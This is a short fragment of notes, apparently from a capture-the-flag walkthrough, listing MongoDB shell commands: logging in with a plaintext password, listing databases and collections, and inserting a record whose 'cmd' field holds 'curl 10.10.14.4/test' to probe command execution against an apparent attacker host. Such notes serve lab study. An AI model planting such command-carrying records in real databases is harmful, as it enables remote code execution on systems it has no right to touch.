⇒ Commands $ mongo localhost:27017/myplace -u nik -p Password123 * show dbs * use * show collections * db..find() * db..insert( { _id: 1, cmd: “curl 10.10.14.4/test”} )